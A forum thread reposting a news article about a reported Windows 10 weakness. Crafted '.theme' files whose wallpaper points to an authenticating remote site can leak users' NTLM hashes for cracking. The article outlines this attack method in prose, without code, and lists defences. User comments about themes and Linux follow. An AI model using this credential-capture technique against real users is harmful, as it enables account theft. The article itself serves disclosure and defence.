Jump to content

New finding says custom Windows 10 themes can be used to steal users' credentials

Recommended Posts

New finding says custom Windows 10 themes can be used to steal users' credentials



A new finding shared on Twitter by security researcher Jimmy Bayne points towards a loophole in Windows 10’s themes settings that can let bad actors steal users’ credentials by creating a specific theme to carry out a ‘Pass-the-Hash’ attack. The ability to install separate themes from other sources lets attackers create malicious themes files that when opened, redirect users to a page that prompts users to enter their credentials.


Windows lets users share themes via the Settings UI by right-clicking on the currently active theme under Personalization > Themes and clicking on “Save theme for sharing”. This creates a ‘.deskthemepack’ file for sharing through email or other sources, which can then be downloaded and installed. Attackers can similarly create a ‘.theme’ file wherein the default wallpaper setting points to a website that requires authentication. When unsuspecting users enter their credentials, an NTLM hash of the details is sent to the site for authentication. Non-complex passwords are then cracked open using special de-hashing software.

One way that the researcher provided for protecting against such files is by looking for and blocking extensions such as ‘.theme’, ‘.themepack’, and ‘.desktopthemepackfile’. Additionally, BleepingComputer lists a few alternatives via group policy that restricts sending NTLM hashed credentials to remote hosts. However, the publication cautions that doing so could interfere with enterprise setups that require this feature for authentication.

Image credit: BleepingComputer

Bayne adds that these findings were disclosed to the Microsoft Security Response Center (MSRC). However, the bug was supposedly not fixed because it was a “feature by design”. It is not clear if the company does plan on fixing the bug post this disclosure, or if it tweaks the file structure for the themes to prevent bad actors from leveraging it to point to sites that require authentication.


Considering that most users are logged into their Microsoft accounts in Windows 10, the theft of the credentials also puts users’ linked data – such as email, OneDrive, and even Azure data – at risk. It is best for users to always enable two-factor authentication as a primary form of account security.


Source: Jimmy Bayne (Twitter) via BleepingComputer



New finding says custom Windows 10 themes can be used to steal users' credentials



  • Like 3
Link to post
Share on other sites

I guess there are still people out there who want their PC to "look pretty" rather than tweaking it to get the maximum speed.  Themes have always been a drag on the system which is why I have never used any, nor any fancy backgrounds.  I coax that maximum speed I can get regardless of the hardware.  So they are definitely targeting a specific class of user, ones we referred to as "Pretty Boys" in years past.

  • Like 2
Link to post
Share on other sites

This is beyond stupid, how can you leave such a big hole in the wall for someone to use like that hahaha, not even sanitize the code of the theme? 

Windows Defender nags me because I download some random exe file but does nothing for what's basically a txt hahah

Link to post
Share on other sites

Windows  10 excessive updates caused   patch  makers to stop making patches for real custom  themes  like  can be done in Windows 8.1 and below .   Only themes Windows 10 has  is the ones approved   by M$  unless you use Windows blinds and using them is not even safe according  the OP  because people log in too  Microsoft online . something  I never done when i was using windows.


On 9/7/2020 at 9:55 PM, straycat19 said:

Themes have always been a drag on the system


x64 Browsers are a drag  on people system too  do you use not use them?  Now days ram is cheap  and most people have plenty of what good is having it if your not going to use it?  A perfectionist  does both they tweak there system to look the best  it  can ) and tune it for to  run fast .  (,good luck with fugly Windows 10  unless  you buy stuff to fix it)


BTW its just  a windows  problem  because windows 10  is full of unneeded  bloat  to start off with stuff  that load  slow  on windows   run fast on Linux  .  Ricing Linux  dont cause a performance hit and the sky is the   limit  and you dont need to patch to go outside of the box  because it's not closed sourced  garbage .


Go  tell  these guys  there pretty boys and see  how many down votes  you can get and they will laugh at you if you tell them that  you use windows.



Themes on Windows 10 are a built in feature controlled  by M$  because patch devs  gave up  because windows 10 updates break there software. If  your having  problems  it means that you need to buy better hardware  or use  Linux  were  you can get away with using  slower hardware. Linux Mint have a  site were were you can  change themes  kind of like Microsoft  does called Cinnamon Spices  but   it also is easy to add your  own from  other places .Cinnamon is one of the most  customizable DEs.  But Mate  is not like because Linux Mint dont provide them for that DE  that you need to install 3rd party themes  to make it look decent. but it nothing hard to do really.


Most Linux Distros  have lots of different DEs  with different themes  . Most people on Linux dont  run  there DE  they way it looked unless it some  Enterprise that  use REDHAT Gnome . Not being able to make and OS to look  the way you want is boring   even if there Rice looks ugly  its the way they wanted it.


Pretty  sells   ugly  does not  that why women love Mac  there nice an shinny .  Giving up looks for speed  or  speed  for looks means that there something  wrong with  your OS  or  you use dated or low end  hardware.


That  why  i use Ubuntu Budgie it looks good out the box . I set  it up one time years ago  the way i wanted mine to look and never had to fool with  it since .


Show us your Budgie Desktop - Ubuntu Budgie




Edited by steven36
  • Like 2
Link to post
Share on other sites
2 hours ago, Sylence said:

Any response/comment from Microsoft? this is so far a one-sided story


From https://secureteam.co.uk/news/vulnerabilities/pass-the-hash-attack-discovered-in-windows-themes/ ...



According to the researcher, Microsoft stated that the software is behaving as designed and has no plans to make a change to thwart this attack vector.


Link to post
Share on other sites

Join the conversation

You can post now and register later. If you have an account, sign in now to post with your account.
Note: Your post will require moderator approval before it will be visible.

Reply to this topic...

×   Pasted as rich text.   Paste as plain text instead

  Only 75 emoji are allowed.

×   Your link has been automatically embedded.   Display as a link instead

×   Your previous content has been restored.   Clear editor

×   You cannot paste images directly. Upload or insert images from URL.

  • Recently Browsing   0 members

    No registered users viewing this page.

  • Create New...